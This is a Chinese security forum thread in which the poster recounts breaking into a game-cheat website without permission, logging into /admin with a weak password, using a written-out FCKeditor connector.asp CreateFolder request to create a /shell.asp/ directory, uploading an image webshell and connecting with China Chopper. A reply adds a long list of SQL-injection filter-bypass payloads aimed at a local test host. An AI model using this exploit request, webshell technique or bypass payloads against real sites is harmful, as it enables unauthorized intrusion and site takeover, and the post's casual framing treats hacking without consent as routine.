用户
搜索

[思路/技术] 一次躁心的渗透经历 heatlevel

  • TA的每日心情
    开心
    2018-4-29 18:01
  • 签到天数: 6 天

    连续签到: 1 天

    [LV.2]偶尔看看

    i春秋作家

    Rank: 7Rank: 7Rank: 7

    7

    主题

    29

    帖子

    200

    魔法币
    收听
    0
    粉丝
    4
    注册时间
    2017-5-2

    i春秋签约作者

    发表于 2018-3-8 23:41:00 55028838
    本帖最后由 顶呱呱小牛 于 2018-3-8 23:44 编辑

    虽然最终是拿下了,但感觉自己好Sb

    又是一个月黑风高的晚上,我打开了电脑。

    在QQ里看到了一个网友发的吃鸡辅助网,就想着测试下

    于是乎就有了下面的故事ing
    1.png



    当然,从表面是看不出什么的,本人手贱习惯在域名后面加上了/admin
    2.png



    出现了这个页面,额...用弱口令吧。
    3.png



    一下子就登路进来了(额,好像一切都很顺利啊)

    OK,看到这么一个界面了 又有个界面很熟悉吧,FCK编辑器 — —!

    当我以为一切的一切都很顺利的时候

    接下来就是见证sb的时刻了
    4.png



    在这个界面的时候,我用了 FCK突破建立文件夹后台拿shell 的方法在地址栏后加入了
    FCKeditor/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=Image&CurrentFolder=%2Fshell.asp&NewFolderName=z&uuid=1244789975684

    这段代码,也很顺利,成功的添加了/shell.asp/这么一个目录。

    (再后面不就应该上传图片一句话直接拿了吗?)

    No,


    5.png

    看到了这个,卧槽,怎么和我想的结果不一样。
    不过后面知道了应该不支持asp的类型,于是我就添加了PHP的图片一句话,
    直接变成了jpg的格式 并且里面的代码全部显示出来了。
    也试过了用二次上传的方法,一样没效果,这个时候就感觉这个后台好像没什么利用的地方了。
    。(末尾的时候才发现自己一直没去看FCK的版本!)
    【柳暗花明又一村】
    再到后面,打算最后再看一看,然后就休息了。
    再进入到/shell.asp/这个文件夹内,
    游客,如果您要查看本帖隐藏内容请回复
    8.png

    然后中国菜刀连接之

    9.png
    在菜刀的管理界面看到了好多个网络小黑的SHELL,看来是给人日穿了
    10.png
    OJBK了,写到了这里,其实也是我自己的问题。各位看官权当是个笑话吧


    不负如来不负卿
    http://192.168.1.131/sqltest.php?x=1%0b%0c%0b%0dand%0b%0c%0b%0d1
    http://192.168.1.131/sqltest.php ... and%0c%0b%0d%0b%0b1
    http://192.168.1.131/sqltest.php ... 0aand+%0b%0d%0b%0a1
    http://192.168.1.131/sqltest.php ... c+and%0c%0a%0d%0c+1
    http://192.168.1.131/sqltest.php?x=1--%0b%0d%0cand--%0b%0d%0c1
    http://192.168.1.131/sqltest.php?x=1%0b++%0band%0b++%0b1
    http://192.168.1.131/sqltest.php?x=1%0a%0a%0band%0a%0a%0b1
    http://192.168.1.131/sqltest.php?x=1--%0b%0f*and--%0b%0f*1
    http://192.168.1.131/sqltest.php ... and%0a%0a%0d%0b%0b1
    http://192.168.1.131/sqltest.php?x=1+%0d%0d%0dand+%0d%0d%0d1
    http://192.168.1.131/sqltest.php?x=1%0a%0c%0b%0cand%0a%0c%0b%0c1
    http://192.168.1.131/sqltest.php ... and%0b%0c%0d%0a%0b1
    http://192.168.1.131/sqltest.php?x=1%0d%0d%0c+and%0d%0d%0c+1
    http://192.168.1.131/sqltest.php?x=1%0b%0d%0d%0aand%0b%0d%0d%0a1
    http://192.168.1.131/sqltest.php?x=1%0a%0d--+and%0a%0d--+1
    http://192.168.1.131/sqltest.php?x=1--%0d`?and--%0d`?1
    http://192.168.1.131/sqltest.php ... and%0b%0a%0b%0c%0d1
    http://192.168.1.131/sqltest.php?x=1%0d%0dand%0d%0d1
    http://192.168.1.131/sqltest.php?x=1%0d%0b%0dand%0d%0b%0d1
    http://192.168.1.131/sqltest.php?x=1%0b%0b%0d%0cand%0b%0b%0d%0c1
    http://192.168.1.131/sqltest.php?x=1%0c%0d%0b+and%0c%0d%0b+1
    http://192.168.1.131/sqltest.php?x=1+--%0eand+--%0e1
    http://192.168.1.131/sqltest.php ... 0cand%0a%0b%0d+%0c1
    http://192.168.1.131/sqltest.php?x=1%0b%0cand%0b%0c1
    http://192.168.1.131/sqltest.php?x=1+%0b%0b%0c+and+%0b%0b%0c+1
    http://192.168.1.131/sqltest.php?x=1%0a%0b%0aand%0a%0b%0a1
    http://192.168.1.131/sqltest.php ... 0dand%0d%0d%0c+%0d1
    http://192.168.1.131/sqltest.php?x=1%0b%0d++%0aand%0b%0d++%0a1
    http://192.168.1.131/sqltest.php?x=1+%0b%0aand+%0b%0a1
    http://192.168.1.131/sqltest.php?x=1--%0b?-and--%0b?-1
    http://192.168.1.131/sqltest.php?x=1%0d%0c+and%0d%0c+1
    http://192.168.1.131/sqltest.php?x=1--%0c%0dand--%0c%0d1
    http://192.168.1.131/sqltest.php?x=1%0b%0d%0b%0cand%0b%0d%0b%0c1
    http://192.168.1.131/sqltest.php?x=1%0d%0d%0b%0dand%0d%0d%0b%0d1
    http://192.168.1.131/sqltest.php?x=1%0c%0d%0band%0c%0d%0b1
    http://192.168.1.131/sqltest.php?x=1%0b+%0band%0b+%0b1
    http://192.168.1.131/sqltest.php?x=1%0d%0a%0b%0band%0d%0a%0b%0b1
    http://192.168.1.131/sqltest.php?x=1+%0d+%0d%0cand+%0d+%0d%0c1
    http://192.168.1.131/sqltest.php?x=1%0c%0d%0c%0band%0c%0d%0c%0b1
    http://192.168.1.131/sqltest.php?x=1.%0c--%0dand.%0c--%0d1
    http://192.168.1.131/sqltest.php ... 0dand%0b%0d%0d+%0d1
    http://192.168.1.131/sqltest.php?x=1+%0d+%0d%0dand+%0d+%0d%0d1
    http://192.168.1.131/sqltest.php?x=1%0a%0d%0cand%0a%0d%0c1
    http://192.168.1.131/sqltest.php ... and%0a%0d%0d%0c%0a1
    http://192.168.1.131/sqltest.php?x=1%0c%0c%0c%0cand%0c%0c%0c%0c1
    http://192.168.1.131/sqltest.php ... and%0b%0d%0d%0b%0d1
    http://192.168.1.131/sqltest.php?x=1%0d%0c%0c%0aand%0d%0c%0c%0a1
    http://192.168.1.131/sqltest.php?x=1%0d%0d%0band%0d%0d%0b1
    http://192.168.1.131/sqltest.php?x=1--%0b*-and--%0b*-1
    http://192.168.1.131/sqltest.php ... 0aand+%0d%0a%0c%0a1
    使用道具 举报 回复
                                       复                  
    使用道具 举报 回复
    学习                                       
    使用道具 举报 回复
    asp的类型,于是我就添加了PHP的图片一句话,
    直接变成了jpg的格式 并且里面的代码全部显示出来了。
    也试过了用二次上传的方法,一样没效果,这个时候就感觉这个
    使用道具 举报 回复
    。(末尾的时候才发现自己一直没去看FCK的版本!)
    【柳暗花明又一村】
    再到后面,打算最后再看一看,然后就休息了。
    再进入到/shell.asp/这个文件夹内,
    使用道具 举报 回复
    直接变成了jpg的格式 并且里面的代码全部显示出来了。
    也试过了用二次上传的方法,一样没效果,这个时候就感觉这个后台好像没什么利用的地方了。
    使用道具 举报 回复

    就感觉这个后台好像没什么利用的地方了。
    。(末尾的时候才发现自己一直没去看FCK的版本!)
    【柳暗花明又一村】
    再到后面,打算最后再看一看,然后
    使用道具 举报 回复
    就感觉这个后台好像没什么利用的地方了。
    。(末尾的时候才发现自己一直没去看FCK的版本!)
    【柳暗花明又一村】
    再到后面,打算最后再看一看,然后
    使用道具 举报 回复
    https://bbs.ichunqiu.com/thread-35408-1-1.html
    使用道具 举报 回复
    这么秀的吗!看看
    使用道具 举报 回复
    一次躁心的渗透经历
    使用道具 举报 回复
    一次躁心的渗透经历
    使用道具 举报 回复
    12346543212345432
    使用道具 举报 回复
    发表于 2018-3-9 10:30:55
    这么秀的吗!看看
    使用道具 举报 回复
    发表于 2018-3-9 10:33:53
    kkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkk
    使用道具 举报 回复
    发表于 2018-3-9 10:34:32
    这么秀的吗!看看
    使用道具 举报 回复
    发表于 2018-3-9 10:34:36
    感谢分享
    使用道具 举报 回复
    666666666666666
    使用道具 举报 回复
    发表于 2018-3-9 10:39:11
    来看看                    
    使用道具 举报 回复
    继续看!
    使用道具 举报 回复
    发表于 2018-3-9 10:43:57
    感谢分享
    以梦为马,浪迹天涯。
    使用道具 举报 回复
    发表于 2018-3-9 10:48:20
    看看思路
    http://nico.lolimoe.cn/blog/
    使用道具 举报 回复
    您需要登录后才可以回帖 登录 | 立即注册